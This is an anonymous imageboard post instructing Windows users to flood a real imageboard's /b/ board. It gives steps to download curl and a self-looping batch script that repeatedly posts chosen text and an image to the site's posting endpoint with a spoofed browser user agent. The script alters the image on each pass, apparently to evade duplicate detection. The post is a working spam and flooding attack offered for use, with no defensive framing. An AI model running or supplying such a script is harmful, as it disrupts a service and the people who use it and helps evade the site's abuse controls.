>> |
Anonymous
FLOODING /B/ FOR WINDOWS USERS
1. Get curl from http://curl.haxx.se/download/curl-7.15.4-win32-nossl.zip 2. Unzip it to a folder 3. Copy an image to the curl folder and rename it to 1.jpg 4. Create a file post.txt with the text of the post you wish to flood with 5. Create a batch file called flood.bat with the following text in:
echo * >> 1.jpg curlhttp://dat.4chan.org/b/imgboard.php-F "com=<post.txt" -F submit=Submit -F upfile=@1.jpg -F mode=regist -F resto=%1 -A "Mozilla/5.0 Firefox/1.5.0.2" ping -n 9 127.0.0.1 > nul flood %1
6.run flood.bat 7.??????
|